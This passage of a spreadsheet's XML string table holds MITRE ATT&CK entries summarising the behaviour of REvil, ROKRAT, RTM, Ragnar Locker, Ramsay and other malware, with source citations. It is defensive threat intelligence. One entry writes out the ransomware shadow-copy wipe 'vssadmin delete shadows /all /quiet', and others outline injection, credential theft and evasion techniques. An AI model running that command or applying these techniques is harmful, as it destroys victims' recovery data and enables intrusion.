    <t>[REvil](https://attack.mitre.org/software/S0496) can decode encrypted strings to enable execution of commands and payloads.(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has infected victim machines through compromised websites and exploit kits.(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks GandCrab and REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mark its binary code for deletion after reboot.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the ability to identify specific files and directories that are not to be encrypted.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can download a copy of itself from an attacker controlled IP address to the victim machine.(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been executed via malicious MS Word e-mail attachments.(Citation: G Data Sodinokibi June 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mimic the names of known executables.(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can save encryption parameters and system information to the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used encrypted strings and configuration files.(Citation: G Data Sodinokibi June 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used PowerShell to delete volume shadow copies and download files.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been distributed via malicious e-mail attachments including MS Word Documents.(Citation: G Data Sodinokibi June 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use the Windows command line to delete volume shadow copies and disable recovery.(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) encrypts files with XOR before sending them back to the C2 server.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) decodes Base64 strings and decrypts strings using a custom XOR algorithm.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uploads and downloads files to and from the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) executes the &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used the [RIPTIDE](https://attack.mitre.org/software/S0003) RAT, which communicates over HTTP with a payload encrypted with RC4.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used [RIPTIDE](https://attack.mitre.org/software/S0003), a RAT that uses HTTP to communicate.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has a audio capture and eavesdropping module.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) steals credentials stored in Web browsers by querying the sqlite database.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can request to upload collected host data and additional files.(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) sends collected files back over same C2 channel.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) uses a keylogger to capture keystrokes and location of where the user is typing.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) accesses the &lt;code&gt;HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData&lt;/code&gt; Registry key to obtain the System manufacturer value to identify the machine type.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system using the gdi32 library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) steals credentials by leveraging the Windows Vault mechanism.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) samples have been signed with a code-signing certificates.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the ability to remove Registry entries that it created during execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates "Windows Update".(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all Registry entries created during its execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can use the &lt;code&gt;FindNextUrlCacheEntryA&lt;/code&gt; and &lt;code&gt;FindFirstUrlCacheEntryA&lt;/code&gt; functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. [RTM](https://attack.mitre.org/software/S0148) has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about process integrity levels.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a Registry Run key under the name "Windows Update" to establish persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about security software on the victim.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) encrypts C2 traffic with a custom RC4 variant.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the computer name, OS version, and default language identifier.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim username and permissions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim time zone.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) uses the command line and rundll32.exe to execute.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using &lt;code&gt;vssadmin delete shadows /all /quiet&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with &lt;code&gt;msiexec.exe&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Before executing malicious code, [Ragnar Locker](https://attack.mitre.org/software/S0481) checks the Windows API &lt;code&gt;GetLocaleInfoW&lt;/code&gt; and doesn't encrypt files if it finds a former Soviet country.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) decrypted its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was installed under names that resembled legitimate Windows file and directory names.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) encrypted its payload using a simple XOR algorithm with a single-byte key.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used a custom packer for its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload, which was compressed using the LZMA algorithm.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used steganography to locate the start of its encoded payload within legitimate 7-Zip code.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [UACMe](https://attack.mitre.org/software/S0116) for privilege escalation.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's file system, as well as &lt;code&gt;.txt&lt;/code&gt;, &lt;code&gt;.doc&lt;/code&gt;, and &lt;code&gt;.xls&lt;/code&gt; files from the Internet Explorer cache.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;ImprovedReflectiveDLLInjection&lt;/code&gt; to deploy components.(Citation: Eset Ramsay May 2020) </t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect directory and file lists.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in &lt;code&gt;%APPDATA%\Microsoft\UserSetting&lt;/code&gt; and &lt;code&gt;%APPDATA%\Microsoft\UserSetting\MediaCache&lt;/code&gt;.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been executed through malicious e-mail attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use Windows API functions such as &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;CloseHandle&lt;/code&gt;, and &lt;code&gt;GetCurrentHwProfile&lt;/code&gt; during its collection and file storage operations. [Ramsay](https://attack.mitre.org/software/S0458) can execute its embedded components via &lt;code&gt;CreateProcessA&lt;/code&gt; and &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can gather a list of running processes by using [Tasklist](https://attack.mitre.org/software/S0057).(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has created Registry Run keys to establish persistence.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can take screenshots every 30 seconds as well as when an external removable storage device is connected.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been distributed through spearphishing emails with malicious attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used base64 to encode its C2 traffic.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has PE data embedded within JPEG files contained within Word documents.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
